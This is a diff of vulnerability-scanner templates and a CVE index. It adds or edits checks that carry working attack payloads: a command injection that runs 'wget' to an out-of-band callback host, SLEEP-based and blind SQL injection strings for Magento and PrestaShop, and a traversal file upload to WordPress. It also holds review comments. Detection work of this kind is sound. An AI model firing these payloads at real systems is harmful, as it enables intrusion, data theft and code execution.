{"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"}
|
||||
{"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"}
|
||||
|
@ -2338,8 +2353,12 @@
|
|||
{"ID":"CVE-2024-22024","Info":{"Name":"Ivanti Connect Secure - XXE","Severity":"high","Description":"Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-22024.yaml"}
|
||||
{"ID":"CVE-2024-22319","Info":{"Name":"IBM Operational Decision Manager - JNDI Injection","Severity":"critical","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-22319.yaml"}
|
||||
{"ID":"CVE-2024-22320","Info":{"Name":"IBM Operational Decision Manager - Java Deserialization","Severity":"high","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-22320.yaml"}
|
||||
{"ID":"CVE-2024-22927","Info":{"Name":"eyoucms v.1.6.5 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-22927.yaml"}
|
||||
{"ID":"CVE-2024-23334","Info":{"Name":"aiohttp - Directory Traversal","Severity":"high","Description":"aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-23334.yaml"}
|
||||
{"ID":"CVE-2024-2340","Info":{"Name":"Avada \u003c 7.11.7 - Information Disclosure","Severity":"medium","Description":"The Avada theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.11.6 via the '/wp-content/uploads/fusion-forms/' directory. This makes it possible for unauthenticated attackers to extract sensitive data uploaded via an Avada created form with a file upload mechanism.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-2340.yaml"}
|
||||
{"ID":"CVE-2024-2389","Info":{"Name":"Progress Kemp Flowmon - Command Injection","Severity":"critical","Description":"In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-2389.yaml"}
|
||||
{"ID":"CVE-2024-23917","Info":{"Name":"JetBrains TeamCity \u003e 2023.11.3 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-23917.yaml"}
|
||||
{"ID":"CVE-2024-24131","Info":{"Name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","Severity":"medium","Description":"SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-24131.yaml"}
|
||||
{"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"}
|
||||
{"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"}
|
||||
{"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"}
|
||||
|
@ -2349,15 +2368,21 @@
|
|||
{"ID":"CVE-2024-27497","Info":{"Name":"Linksys E2000 1.0.06 position.js Improper Authentication","Severity":"high","Description":"Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27497.yaml"}
|
||||
{"ID":"CVE-2024-27564","Info":{"Name":"ChatGPT个人专用版 - Server Side Request Forgery","Severity":"high","Description":"A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27564.yaml"}
|
||||
{"ID":"CVE-2024-27954","Info":{"Name":"WordPress Automatic Plugin \u003c3.92.1 - Arbitrary File Download and SSRF","Severity":"critical","Description":"WordPress Automatic plugin \u003c3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27954.yaml"}
|
||||
{"ID":"CVE-2024-27956","Info":{"Name":"WordPress Automatic Plugin \u003c= 3.92.0 - SQL Injection","Severity":"critical","Description":"The Automatic plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.92.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-27956.yaml"}
|
||||
{"ID":"CVE-2024-28255","Info":{"Name":"OpenMetadata - Authentication Bypass","Severity":"critical","Description":"OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `JwtFilter` handles the API authentication by requiring and verifying JWT tokens. When a new request comes in, the request's path is checked against this list. When the request's path contains any of the excluded endpoints the filter returns without validating the JWT. Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings. For example, a request to `GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/111` will match the excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the authentication mechanism and reach any arbitrary endpoint, including the ones listed above that lead to arbitrary SpEL expression injection. This bypass will not work when the endpoint uses the `SecurityContext.getUserPrincipal()` since it will return `null` and will throw an NPE. This issue may lead to authentication bypass and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-237`.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-28255.yaml"}
|
||||
{"ID":"CVE-2024-28734","Info":{"Name":"Coda v.2024Q1 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in Unit4 Financials by Coda v.2024Q1 allows a remote attacker to escalate privileges via a crafted script to the cols parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-28734.yaml"}
|
||||
{"ID":"CVE-2024-2876","Info":{"Name":"Wordpress Email Subscribers by Icegram Express - SQL Injection","Severity":"critical","Description":"The Email Subscribers by Icegram Express - Email Marketing, Newsletters, Automation for WordPress \u0026 WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-2876.yaml"}
|
||||
{"ID":"CVE-2024-2879","Info":{"Name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","Severity":"critical","Description":"The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-2879.yaml"}
|
||||
{"ID":"CVE-2024-29059","Info":{"Name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","Severity":"high","Description":".NET Framework Information Disclosure Vulnerability","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-29059.yaml"}
|
||||
{"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"}
|
||||
{"ID":"CVE-2024-3136","Info":{"Name":"MasterStudy LMS \u003c= 3.3.3 - Unauthenticated Local File Inclusion via template","Severity":"critical","Description":"The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \"safe\" file types can be uploaded and included.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3136.yaml"}
|
||||
{"ID":"CVE-2024-31621","Info":{"Name":"Flowise 1.6.5 - Authentication Bypass","Severity":"high","Description":"The flowise version \u003c= 1.6.5 is vulnerable to authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-31621.yaml"}
|
||||
{"ID":"CVE-2024-31849","Info":{"Name":"CData API Server \u003c 23.4.8844 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData API Server \u003c 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31849.yaml"}
|
||||
{"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"}
|
||||
{"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"high","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"}
|
||||
{"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"}
|
||||
{"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"}
|
||||
{"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"}
|
||||
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
|
||||
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}
|
||||
{"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"}
|
||||
|
|
|
@ -1 +1 @@
|
|||
a601931b82eff7c0eb13a1a141ecdbcd
|
||||
56b04172c1df6906eb35bc5859e652a2
|
||||
|
|
|
@ -4,13 +4,15 @@ info:
|
|||
name: Cerberus Malware - Detect
|
||||
author: daffainfo
|
||||
severity: info
|
||||
reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Cerberus.yar
|
||||
reference:
|
||||
- https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Cerberus.yar
|
||||
tags: malware,file
|
||||
|
||||
file:
|
||||
- extensions:
|
||||
- all
|
||||
|
||||
matchers-condition: or
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: raw
|
||||
|
@ -25,5 +27,4 @@ file:
|
|||
words:
|
||||
- "cerberus"
|
||||
case-insensitive: true
|
||||
|
||||
# digest: 490a00463044022006c23cd80a8b9974883e26b0cfb251e5834a1340be09efe1c38d397f5ea1b9470220723d8425e377276fde160744c4191d1496a8ad12d48084235c96fc995c3deace:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502200678f44915a5092567fbd406db0b2f65cef3054cdfcead092d2c7b6948b4a1140221009fc67f2da5ca58feecf9cbae46120b737b1d0c4f70697c4cb8c2aea828a3d4be:922c64590222798bb761d5b6d8e72950
|
|
@ -20,7 +20,7 @@ info:
|
|||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /guest_auth/guestIsUp.php
|
||||
POST /guest_auth/guestIsUp.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
mac=1&ip=127.0.0.1|wget {{interactsh-url}}
|
||||
|
@ -32,4 +32,4 @@ http:
|
|||
name: http
|
||||
words:
|
||||
- "http"
|
||||
# digest: 490a0046304402202d6b248201cb2194c4824f5ec119cef5b993674b0ca7deb993bbb91ce2c4f4e002206eb8515733c686fabf67c25c8b5a3cb2713cf95ec51cd8e696634247b0cb688a:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022067cf25f298daa2b560fc63730df160e8dec545619c2157c63da48b60dd2135e8022100eb4e2b096d6e640659ad337e303506d4a65d47211414037ec52449106f264578:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,69 @@
|
|||
id: CVE-2015-4455
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload
|
||||
author: MaStErChO
|
||||
severity: critical
|
||||
description: |
|
||||
Unrestricted file upload vulnerability in includes/upload.php in the Aviary Image Editor Add-on For Gravity Forms plugin 3.0 beta for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in wp-content/uploads/gform_aviary.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-4455
|
||||
- http://packetstormsecurity.com/files/132256/WordPress-Aviary-Image-Editor-Add-On-For-Gravity-Forms-3.0-Beta-Shell-Upload.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2015-4455
|
||||
cwe-id: CWE-434
|
||||
epss-score: 0.28491
|
||||
epss-percentile: 0.96807
|
||||
cpe: cpe:2.3:a:aviary_image_editor_add-on_for_gravity_forms_project:aviary_image_editor_add-on_for_gravity_forms:*:beta:*:*:*:wordpress:*:*
|
||||
metadata:
|
||||
vendor: aviary_image_editor_add-on_for_gravity_forms_project
|
||||
product: aviary_image_editor_add-on_for_gravity_forms
|
||||
framework: wordpress
|
||||
tags: cve,cve2015,packetstorm,intrusive,file-upload
|
||||
variables:
|
||||
filename: '{{rand_base(7, "abc")}}'
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /?gf_page=upload HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /?gf_page=upload HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=a54906fe12c504cb01ca836d062f82fa
|
||||
|
||||
--a54906fe12c504cb01ca836d062f82fa
|
||||
Content-Disposition: form-data; name="field_id"
|
||||
|
||||
3
|
||||
--a54906fe12c504cb01ca836d062f82fa
|
||||
Content-Disposition: form-data; name="form_id"
|
||||
|
||||
1
|
||||
--a54906fe12c504cb01ca836d062f82fa
|
||||
Content-Disposition: form-data; name="gform_unique_id"
|
||||
|
||||
../../../
|
||||
--a54906fe12c504cb01ca836d062f82fa
|
||||
Content-Disposition: form-data; name="name"
|
||||
|
||||
{{filename}}.phtml
|
||||
--a54906fe12c504cb01ca836d062f82fa
|
||||
Content-Disposition: form-data; name="file"; filename="{{filename}}.jpg"
|
||||
Content-Type: text/html
|
||||
|
||||
{{randstr}}
|
||||
--a54906fe12c504cb01ca836d062f82fa--
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_1, "Failed to upload file")'
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(body_2, "uploaded_filename\":\"{{filename}}.jpg")'
|
||||
condition: and
|
||||
# digest: 4b0a0048304602210086997acf11c57218a01b0591b45c9e1e9e0171e8f12c848b7e95c91d35edf190022100973637bca29c3c89a004d205adfe81cc82708d8f58f0d0702faed7113ffcf973:922c64590222798bb761d5b6d8e72950
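Review bot: The `metadata` block has no `max-request` entry although the template sends two raw requests, and nothing in the file records that the second request leaves an uploaded file on the scanned host. I would add `max-request: 2` under `metadata:` and a comment above the POST such as `# intrusive: uploads {{filename}}.phtml to the target and does not remove it`, so anyone filtering on the `intrusive` tag can see what the side effect is. The matcher only confirms the upload response echo (`uploaded_filename` ending in `.jpg`), not that the `.phtml` name was honoured. A hit therefore presumably means the upload endpoint accepted the file rather than that code execution was shown, and the `description` should say so.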
|
|
@ -0,0 +1,70 @@
|
|||
id: CVE-2019-7139
|
||||
|
||||
info:
|
||||
name: Magento - SQL Injection
|
||||
author: MaStErChO
|
||||
severity: critical
|
||||
description: |
|
||||
An unauthenticated user can execute SQL statements that allow arbitrary read access to the underlying database, which causes sensitive data leakage.
|
||||
remediation: This issue is fixed in Magento 2.1 prior to 2.1.18, Magento 2.2 prior to 2.2.9, Magento 2.3 prior to 2.3.2.
|
||||
reference:
|
||||
- https://pentest-tools.com/blog/exploiting-sql-injection-in-magento-with-sqlmap
|
||||
- https://www.ambionics.io/blog/magento-sqli
|
||||
- https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13
|
||||
- https://github.com/koutto/jok3r-pocs
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2019-7139
|
||||
cwe-id: CWE-89
|
||||
epss-score: 0.00582
|
||||
epss-percentile: 0.778
|
||||
cpe: cpe:2.3:a:magento:magento:*:*:*:*:open_source:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 4
|
||||
vendor: magento
|
||||
product: magento
|
||||
framework: magento
|
||||
shodan-query: http.component:"Magento"
|
||||
tags: cve,cve2019,sqli,magento
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
@timeout: 20s
|
||||
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((6)))a)%3d1+--+- HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20- HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
name: time-based
|
||||
dsl:
|
||||
- 'duration_2>=6'
|
||||
- 'status_code_1 == 200'
|
||||
- 'contains(body_1, "text/x-magento-init")'
|
||||
- 'contains(content_type_2, "application/json")'
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
name: blind-based
|
||||
dsl:
|
||||
- 'contains(body_1, "text/x-magento-init")'
|
||||
- 'contains(content_type_3, "application/json") && contains(content_type_4, "application/json")'
|
||||
- 'status_code_3 == 200 && status_code_4 == 400'
|
||||
- 'len(body_3) == 2 && len(body_4) == 2'
|
||||
condition: and
|
||||
# digest: 490a0046304402200eea406b4dd10703c590fb378ef5037c6dd0f56ba1b1059e66e8105bca0f38f7022021af5ceb6e9087fbafeb243ba19617bd9e3e9aaff723ebd4fea7892cee66428d:922c64590222798bb761d5b6d8e72950
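Review bot: The `remediation` line reads "fixed in Magento 2.1 prior to 2.1.18 ...", which gives the affected range as if it were the fix. It should name the fixed releases instead, e.g. `remediation: Upgrade to Magento 2.1.18, 2.2.9, 2.3.2 or later.` Separately, the `time-based` matcher relies on a single `duration_2>=6` measurement with no baseline timing, so a slow or throttled host that answers the second request with JSON could be reported. A comment above that matcher, such as `# single timing sample, no baseline; confirm hits manually`, would make the limitation visible to whoever triages the result.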
|
|
@ -27,7 +27,7 @@ info:
|
|||
vendor: hitachi
|
||||
product: vantara_pentaho_business_analytics_server
|
||||
shodan-query: http.favicon.hash:1749354953
|
||||
tags: cve,cve2022,packetstorm,rce,ssti,pentaho,kev,hitachi
|
||||
tags: cve,cve2022,packetstorm,rce,ssti,pentaho,hitachi
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
|
@ -50,4 +50,4 @@ http:
|
|||
part: header
|
||||
words:
|
||||
- "application/json"
|
||||
# digest: 4b0a004830460221008c170d16acd8d4fcd8b061a57759895cb1c1f4d2d844154a2bc28d348695383502210082727ca9d4adcdf1004042ef259119a55de484872ede8cad1aaf0ded1f7c2d8d:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100b6741a571d75e359c60ca79e0081337777b9697c68b0739b50509dc80d199bb3022051e8b48b4f9a5f97c6c7c753a04b14967c4a085998f070e01e462a0e8e0a6561:922c64590222798bb761d5b6d8e72950
|
|
@ -30,7 +30,7 @@ info:
|
|||
product: vbulletin
|
||||
shodan-query: http.component:"vBulletin"
|
||||
google-query: intext:"Powered By vBulletin"
|
||||
tags: cve2023,cve,vbulletin,rce,kev
|
||||
tags: cve,cve2023,vbulletin,rce
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
@ -58,4 +58,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100e3543011414a95d92a92d49677025acf633380fe2b7f42668cac5c7352466dd5022100fb6ff50e66a0ef042fe1a9d2f16946b7092d1049b62c8660449fb6c7fec3fd16:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100ce2bf923005a767a1b859b3e4f2a4fce8709e03f3e8ca3913a9b86099ccf4d6d02203544ccb00bbe8541385556ded06192cb9d058e991038779cf79a4934da6495bf:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,66 @@
|
|||
id: CVE-2023-27032
|
||||
|
||||
info:
|
||||
name: PrestaShop AdvancedPopupCreator - SQL Injection
|
||||
author: MaStErChO
|
||||
severity: critical
|
||||
description: |
|
||||
In the module “Advanced Popup Creator” (advancedpopupcreator) from Idnovate for PrestaShop, a guest can perform SQL injection in affected versions.
|
||||
reference:
|
||||
- https://security.friendsofpresta.org/modules/2023/04/11/advancedpopupcreator.html
|
||||
- https://addons.prestashop.com/en/pop-up/23773-popup-on-entry-exit-popup-add-product-and-newsletter.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-27032
|
||||
cwe-id: CWE-89
|
||||
epss-score: 0.00106
|
||||
epss-percentile: 0.42495
|
||||
cpe: cpe:2.3:a:idnovate:popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter:*:*:*:*:*:prestashop:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
vendor: idnovate
|
||||
product: popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter
|
||||
framework: prestashop
|
||||
shodan-query: http.component:"prestashop"
|
||||
verified: true
|
||||
tags: cve,cve2023,sqli,prestashop,advancedpopupcreator
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
@timeout 10s
|
||||
POST /module/advancedpopupcreator/popup HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
availablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- duration>=6
|
||||
- status_code == 200
|
||||
- contains(content_type, "text/html")
|
||||
- contains_all(body, 'popups','hasError')
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: time
|
||||
group: 1
|
||||
regex:
|
||||
- ',"time":([0-9]+),'
|
||||
internal: true
|
||||
|
||||
- type: regex
|
||||
name: token
|
||||
group: 1
|
||||
regex:
|
||||
